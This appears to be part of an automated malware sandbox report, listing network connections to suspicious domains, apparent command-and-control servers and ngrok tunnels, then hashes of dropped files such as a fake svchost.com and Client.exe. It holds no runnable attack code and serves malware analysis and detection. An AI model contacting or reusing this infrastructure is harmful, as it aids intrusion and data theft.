RU 185.215.113.66:80 twizthash.net tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 twizthash.net tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
CN 120.76.203.28:80 client.9377.com tcp
RU 185.215.113.217:80 185.215.113.217 tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.python.org udp
US 151.101.128.223:443 www.python.org tcp
RU 185.215.113.66:80 twizthash.net tcp
US 8.8.8.8:53 223.128.101.151.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 137.184.144.245:4782 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 64.190.113.79:443 tcp
CN 112.74.95.85:8888 tcp
US 8.8.8.8:53 blasterrysbio.cyou udp
US 8.8.8.8:53 worddosofrm.shop udp
US 8.8.8.8:53 mutterissuen.shop udp
US 8.8.8.8:53 standartedby.shop udp
US 8.8.8.8:53 nightybinybz.shop udp
US 8.8.8.8:53 conceszustyb.shop udp
US 8.8.8.8:53 bakedstusteeb.shop udp
US 8.8.8.8:53 respectabosiz.shop udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 moutheventushz.shop udp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
US 8.8.8.8:53 108.209.109.20.in-addr.arpa udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.y2126.com udp
UZ 94.141.68.56:40500 udp
KZ 95.58.91.70:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 56.68.141.94.in-addr.arpa udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KR 123.214.186.171:40500 udp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 171.186.214.123.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
GE 62.212.36.229:40500 udp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 229.36.212.62.in-addr.arpa udp
N/A 192.168.100.18:4782 tcp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 tmpfiles.org udp
US 172.67.195.247:443 tmpfiles.org tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 rentry.co udp
US 104.26.2.16:443 rentry.co tcp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 247.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 16.2.26.104.in-addr.arpa udp
US 64.190.113.79:443 tcp
TJ 109.74.69.43:40500 udp
US 8.8.8.8:53 43.69.74.109.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
KZ 92.47.143.122:40500 udp
US 8.8.8.8:53 122.143.47.92.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
YE 46.161.239.195:40500 udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
SY 82.137.239.235:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
CI 160.155.209.135:40500 udp
US 8.8.8.8:53 135.209.155.160.in-addr.arpa udp
US 64.190.113.79:443 tcp
TH 154.197.69.165:80 154.197.69.165 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 165.69.197.154.in-addr.arpa udp
US 8.8.8.8:53 jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD udp
TR 85.103.235.188:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 188.235.103.85.in-addr.arpa udp
CN 111.231.145.137:8888 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 137.184.144.245:4782 tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
SY 95.212.18.228:40500 udp
US 8.8.8.8:53 228.18.212.95.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 thizx13vt.top udp
US 20.83.148.22:80 170.114.78.80 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
KZ 5.251.234.88:40500 udp
US 8.8.8.8:53 88.234.251.5.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
TH 154.197.69.165:7000 tcp
US 64.190.113.79:443 tcp
UZ 213.230.99.184:40500 udp
US 8.8.8.8:53 184.99.230.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
IR 2.181.30.194:40500 tcp
US 8.8.8.8:53 thizx13vt.top udp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 xred.mooo.com udp
US 8.8.8.8:53 freedns.afraid.org udp
US 69.42.215.252:80 freedns.afraid.org tcp
N/A 224.0.0.251:5353 udp
YE 94.26.219.44:40500 udp
US 8.8.8.8:53 252.215.42.69.in-addr.arpa udp
US 8.8.8.8:53 44.219.26.94.in-addr.arpa udp
US 64.190.113.79:443 tcp
CN 47.115.166.43:80 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
MX 187.230.224.82:40500 udp
IR 46.100.82.131:40500 tcp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 thizx13vt.top udp
KZ 5.63.94.144:40500 udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 89.236.216.14:40500 udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
IR 5.232.126.125:40500 udp
US 8.8.8.8:53 125.126.232.5.in-addr.arpa udp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 thizx13vt.top udp
RU 185.215.113.217:80 185.215.113.217 tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
US 64.190.113.79:443 tcp
IR 94.183.35.46:40500 udp
US 8.8.8.8:53 46.35.183.94.in-addr.arpa udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
MX 189.167.5.148:40500 udp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 148.5.167.189.in-addr.arpa udp
US 137.184.144.245:4782 tcp
SA 193.122.74.238:1337 193.122.74.238 tcp
PK 182.188.65.58:40500 tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 238.74.122.193.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 www.teknoarge.com udp
TR 31.145.124.122:80 www.teknoarge.com tcp
US 8.8.8.8:53 122.124.145.31.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 thizx13vt.top udp
UZ 87.237.236.86:40500 udp
US 8.8.8.8:53 86.236.237.87.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 20.83.148.22:80 www.zillow.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
US 8.8.8.8:53 roaddrermncomplai.shop udp
US 8.8.8.8:53 racedsuitreow.shop udp
US 8.8.8.8:53 defenddsouneuw.shop udp
US 8.8.8.8:53 deallyharvenw.shop udp
US 8.8.8.8:53 priooozekw.shop udp
US 8.8.8.8:53 pumpkinkwquo.shop udp
US 8.8.8.8:53 abortinoiwiam.shop udp
US 8.8.8.8:53 surroundeocw.shop udp
US 8.8.8.8:53 covvercilverow.shop udp
US 8.8.8.8:53 steamcommunity.com udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 194.48.233.193.in-addr.arpa udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 marshal-zhukov.com udp
RU 185.215.113.36:80 185.215.113.36 tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
IN 59.91.192.115:40500 udp
US 8.8.8.8:53 115.192.91.59.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
TR 31.145.124.122:443 www.teknoarge.com tcp
RU 185.215.113.66:80 twizthash.net tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 loeghaiofiehfihf.to udp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
HU 38.180.109.140:20007 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
US 8.8.8.8:53 115.154.197.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
GB 89.197.154.115:7700 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 52.57.120.10:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 10.120.57.52.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 delaylacedmn.site udp
US 8.8.8.8:53 famikyjdiag.site udp
US 8.8.8.8:53 possiwreeste.site udp
US 8.8.8.8:53 commandejorsk.site udp
US 8.8.8.8:53 underlinemdsj.site udp
US 8.8.8.8:53 bellykmrebk.site udp
US 8.8.8.8:53 agentyanlark.site udp
US 8.8.8.8:53 writekdmsnu.site udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 dez345-37245.portmap.host udp
PK 202.70.150.106:40500 udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.150.70.202.in-addr.arpa udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
US 172.67.160.80:443 marshal-zhukov.com tcp
DE 3.78.28.71:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 aiiaiafrzrueuedur.net udp
RU 185.215.113.66:80 aiiaiafrzrueuedur.net tcp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 71.28.78.3.in-addr.arpa udp
US 64.190.113.79:443 tcp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 wrappyskmwio.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 egorepetiiiosn.shop udp
US 8.8.8.8:53 shelterryujxo.shop udp
US 8.8.8.8:53 chequedxmznp.shop udp
US 8.8.8.8:53 illnesmunxkza.shop udp
US 8.8.8.8:53 triallyforwhgh.shop udp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 shootydowtqosm.shop udp
US 8.8.8.8:53 faceddullinhs.shop udp
US 8.8.8.8:53 ammycanedpors.shop udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 64.190.113.79:443 tcp
IR 2.177.40.206:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 206.40.177.2.in-addr.arpa udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 170.114.78.80 tcp
YE 46.35.79.193:40500 tcp
US 8.8.8.8:53 123.198.153.18.in-addr.arpa udp
US 8.8.8.8:53 docs.google.com udp
GB 142.250.187.206:443 docs.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.200.3:80 o.pki.goog tcp
HU 38.180.109.140:20007 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
IR 2.191.61.218:40500 udp
US 8.8.8.8:53 218.61.191.2.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 0.tcp.in.ngrok.io udp
US 64.190.113.79:443 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
IR 2.189.31.47:40500 udp
US 8.8.8.8:53 47.31.189.2.in-addr.arpa udp
US 8.8.8.8:53 mundoparachicas.space udp
US 172.67.199.148:443 mundoparachicas.space tcp
US 64.190.113.79:443 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 148.199.67.172.in-addr.arpa udp
HU 38.180.109.140:20007 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 tcp
IR 46.167.149.255:40500 udp
US 8.8.8.8:53 255.149.167.46.in-addr.arpa udp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
HU 38.180.109.140:20007 tcp
UZ 90.156.167.42:40500 udp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 42.167.156.90.in-addr.arpa udp
US 64.190.113.79:443 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 thizx13vt.top udp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
UZ 90.156.163.98:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
RU 178.206.158.183:40500 udp
US 8.8.8.8:53 183.158.206.178.in-addr.arpa udp
CN 106.42.31.65:8088 tcp
FR 176.150.119.15:56001 tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
IR 2.180.218.158:40500 udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
NL 91.92.240.41:80 tcp
US 8.8.8.8:53 158.218.180.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 thizx13vt.top udp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
US 20.83.148.22:80 tcp
UZ 213.230.91.87:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 87.91.230.213.in-addr.arpa udp
BG 87.120.126.5:80 87.120.126.5 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
US 20.83.148.22:80 tcp
HU 38.180.109.140:20007 tcp
US 8.8.8.8:53 5.126.120.87.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 64.190.113.79:443 tcp
MX 189.141.139.39:40500 udp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 39.139.141.189.in-addr.arpa udp
US 64.190.113.79:443 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 thizx13vt.top udp
N/A 192.168.100.18:4782 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
HU 38.180.109.140:20007 tcp
RU 185.215.113.206:80 185.215.113.206 tcp
IR 2.181.218.207:40500 udp
US 8.8.8.8:53 property-imper.sbs udp
US 8.8.8.8:53 frogs-severz.sbs udp
US 8.8.8.8:53 occupy-blushi.sbs udp
US 8.8.8.8:53 207.218.181.2.in-addr.arpa udp
US 8.8.8.8:53 blade-govern.sbs udp
US 172.67.153.209:443 blade-govern.sbs tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 story-tense-faz.sbs udp
US 104.21.1.25:443 story-tense-faz.sbs tcp
US 8.8.8.8:53 209.153.67.172.in-addr.arpa udp
US 8.8.8.8:53 leg-sate-boat.sbs udp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 disobey-curly.sbs udp
US 172.67.223.140:443 disobey-curly.sbs tcp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 motion-treesz.sbs udp
US 172.67.141.76:443 motion-treesz.sbs tcp
US 8.8.8.8:53 powerful-avoids.sbs udp
US 172.67.187.4:443 powerful-avoids.sbs tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 140.223.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 64.190.113.79:443 tcp
IR 46.248.34.12:40500 tcp
IR 2.179.117.33:40500 udp
US 64.190.113.79:443 tcp
HU 38.180.109.140:20007 tcp
FR 176.150.119.15:56001 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
DE 18.153.198.123:15174 0.tcp.eu.ngrok.io tcp
NL 91.92.240.41:80 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 thizx13vt.top udp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
IR 195.181.23.242:40500 udp
US 8.8.8.8:53 242.23.181.195.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 52.57.120.10:15174 0.tcp.eu.ngrok.io tcp
US 20.83.148.22:80 tcp
DE 193.161.193.99:37245 dez345-37245.portmap.host tcp
HU 38.180.109.140:20007 tcp
SY 5.134.251.133:40500 udp
US 8.8.8.8:53 thizx13vt.top udp
US 8.8.8.8:53 133.251.134.5.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 0.tcp.in.ngrok.io udp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp

Files

memory/1808-0-0x0000000074F8E000-0x0000000074F8F000-memory.dmp

memory/1808-1-0x0000000000210000-0x0000000000218000-memory.dmp

memory/1808-2-0x0000000004AB0000-0x0000000004B4C000-memory.dmp

memory/1808-3-0x0000000074F80000-0x0000000075731000-memory.dmp

memory/1808-4-0x0000000074F8E000-0x0000000074F8F000-memory.dmp

memory/1808-5-0x0000000074F80000-0x0000000075731000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe

MD5 2cca969570717a0af4f2531eb69cc7c9
SHA1 692243584cca03a41bab00ae6113e6e7a3d14863
SHA256 a9971d2f3b8c1611723938a3ea6578c27f31049d3297e607cf0ee6927a4a26c7
SHA512 3a2257abdadb2ef34a8171a3c3965b8e6bba955dcda0ca837a635736da0f17795e71ff93d8f4421a51ac9778d10dce1f3c28a62149d05ccf07ae75934fff5670

C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe

MD5 2cbd6ad183914a0c554f0739069e77d7
SHA1 7bf35f2afca666078db35ca95130beb2e3782212
SHA256 2cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f
SHA512 ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

MD5 ac3a5f7be8cd13a863b50ab5fe00b71c
SHA1 eee417cd92e263b84dd3b5dcc2b4b463fe6e84d9
SHA256 8f5e89298e3dc2e22d47515900c37cca4ee121c5ba06a6d962d40ad6e1a595da
SHA512 c8bbe791373dad681f0ac9f5ab538119bde685d4f901f5db085c73163fc2e868972b2de60e72ccd44f745f1fd88fcde2e27f32302d8cbd3c1f43e6e657c79fba

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.inf

MD5 ad8982eaa02c7ad4d7cdcbc248caa941
SHA1 4ccd8e038d73a5361d754c7598ed238fc040d16b
SHA256 d63c35e9b43eb0f28ffc28f61c9c9a306da9c9de3386770a7eb19faa44dbfc00
SHA512 5c805d78bafff06c36b5df6286709ddf2d36808280f92e62dc4c285edd9176195a764d5cf0bb000da53ca8bbf66ddd61d852e4259e3113f6529e2d7bdbdd6e28

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dsetup.dll

MD5 984cad22fa542a08c5d22941b888d8dc
SHA1 3e3522e7f3af329f2235b0f0850d664d5377b3cd
SHA256 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308
SHA512 8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dsetup32.dll

MD5 a5412a144f63d639b47fcc1ba68cb029
SHA1 81bd5f1c99b22c0266f3f59959dfb4ea023be47e
SHA256 8a011da043a4b81e2b3d41a332e0ff23a65d546bd7636e8bc74885e8746927d6
SHA512 2679a4cb690e8d709cb5e57b59315d22f69f91efa6c4ee841943751c882b0c0457fd4a3376ac3832c757c6dfaffb7d844909c5665b86a95339af586097ee0405

C:\Users\Admin\AppData\Local\Temp\Files\client.exe

MD5 29de30606fa3cd9024d87066016d0351
SHA1 32af15b435a5f26655947612fe30da89b5a29370
SHA256 56a35f9bcb582449d44a4bed4fa36dcb140f04961f0f1fec1d96385569f72cac
SHA512 6fbe73cddab8a943d1ce060da1a3d26832616aefad76fe3b1dbd71991e4412a591133aee34df6a467a15acce8c587ea1420ca2f0dc4c8c77d54b8712a00a9355

C:\Windows\svchost.com

MD5 ead203cb6aa81e842d32f43fab32c493
SHA1 124b348eb437e838674f5b9de4e98da20c17ef60
SHA256 c6845f33531b0405b1f2b248aa2e9c429bb074fd32589fa55d4429ce2dfc96ef
SHA512 a60434cb1ed67867613951ca4a09c8c3b7ba34ca7d03e16399eb96b771d41f96d7efdcd39f6e35cc1e341f273d3303584c3c981943e3e2d6bc016471f51cfc5d

memory/3048-81-0x0000000000550000-0x0000000000874000-memory.dmp

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe

MD5 892cf4fc5398e07bf652c50ef2aa3b88
SHA1 c399e55756b23938057a0ecae597bd9dbe481866
SHA256 e2262c798729169f697e6c30e5211cde604fd8b14769311ff4ea81abba8c2781
SHA512 f16a9e4b1150098c5936ec6107c36d47246dafd5a43e9f4ad9a31ecab69cc789c768691fa23a1440fae7f6e93e8e62566b5c86f7ed6bb4cfe26368149ea8c167

C:\PROGRA~2\Google\Update\DISABL~1.EXE

MD5 7429ce42ac211cd3aa986faad186cedd
SHA1 b61a57f0f99cfd702be0fbafcb77e9f911223fac
SHA256 d608c05409ac4bd05d8e0702fcf66dfae5f4f38cbae13406842fa5504f4d616f
SHA512 ee4456877d6d881d9904013aabecb9f2daf6fc0ec7a7c9251e77396b66a7f5a577fe8544e64e2bb7464db429db56a3fe47c183a81d40cc869d01be573ab5e4c1

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE

MD5 1e09e65111ab34cb84f7855d3cddc680
SHA1 f9f852104b46d99cc7f57a6f40d5db2090be04c0
SHA256 8f5c7c8e0258a5caa37637b2fa36f3bd87569a97b5c1ecf40dab50e7255fcf9c
SHA512 003176cb9dd7668b1b40e4d60d86d57c1a9ec4d873382aab781b31c8c89f0e388f3d406963f159412e2828d0be9f6daea146a252d8ee47281dda01123c9e7ace

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 ef725bbc6052f8751afb1e3ca0ae58cc
SHA1 d76a87278260f658bb7fa465ceae9fed13b72358
SHA256 4a720462481db2dfdd1213396de56329f4b527f7c8a6de8782f03c86657b3f68
SHA512 5b6de41eb9efb429451d6d55e3ce122f9271dd8bf0c87a9f700061f414d10d01758f6e78f11c6909eb33d10612b7f741425863e7b0d18c6bc3d8032d82eb99c0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

MD5 b08c36ce99a5ed11891ef6fc6d8647e9
SHA1 db95af417857221948eb1882e60f98ab2914bf1d
SHA256 cc9248a177495f45ec70b86c34fc5746c56730af36ace98ac7eb365dbafda674
SHA512 07e62581eace395b0a9699d727761648103180c21155d84ea09140f9e1c9690705c419118545aa67a564334bbde32710225fe3aa92b0b4b4210cb91f0058b1ea

memory/1352-216-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Windows\directx.sys

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE

MD5 63dc05e27a0b43bf25f151751b481b8c
SHA1 b20321483dac62bce0aa0cef1d193d247747e189
SHA256 7d607fb69c69a72a5bf4305599279f46318312ce1082b6a34ac9100b8c7762ce
SHA512 374d705704d456cc5f9f79b7f465f6ec7c775dc43001c840e9d6efbbdef20926ed1fa97f8a9b1e73161e17f72520b96c05fa58ac86b3945208b405f9166e7ba3

C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE

MD5 86749cd13537a694795be5d87ef7106d
SHA1 538030845680a8be8219618daee29e368dc1e06c
SHA256 8c35dcc975a5c7c687686a3970306452476d17a89787bc5bd3bf21b9de0d36a5
SHA512 7b6ae20515fb6b13701df422cbb0844d26c8a98087b2758427781f0bf11eb9ec5da029096e42960bf99ddd3d4f817db6e29ac172039110df6ea92547d331db4c

C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE

MD5 9597098cfbc45fae685d9480d135ed13
SHA1 84401f03a7942a7e4fcd26e4414b227edd9b0f09
SHA256 45966655baaed42df92cd6d8094b4172c0e7a0320528b59cf63fca7c25d66e9c
SHA512 16afbdffe4b4b2e54b4cc96fe74e49ca367dea50752321ddf334756519812ba8ce147ef5459e421dc42e103bc3456aab1d185588cc86b35fa2315ac86b2a0164

C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE

MD5 9c10a5ec52c145d340df7eafdb69c478
SHA1 57f3d99e41d123ad5f185fc21454367a7285db42
SHA256 ccf37e88447a7afdb0ba4351b8c5606dbb05b984fb133194d71bcc00d7be4e36
SHA512 2704cfd1a708bfca6db7c52467d3abf0b09313db0cdd1ea8e5d48504c8240c4bf24e677f17c5df9e3ac1f6a678e0328e73e951dc4481f35027cb03b2966dc38f

C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE

MD5 97510a7d9bf0811a6ea89fad85a9f3f3
SHA1 2ac0c49b66a92789be65580a38ae9798237711db
SHA256 c48abbc29405559e68cc9f8fc6d218aa317a9d0023839c7846ca509c1f563fea
SHA512 2a93e2a3bd187fdde160f87ef777ccd1d1c398d547b7c869e6b64469b9418ad04d887cdfe94af7407476377bf2d009f576de3935c025b7aefbab26fbcd8f90fb

C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe

MD5 71685fb1a3701f1e27e48ba3e3ce9530
SHA1 f460a9ecc7e35b4691532bc6c647dbe3973a51ca
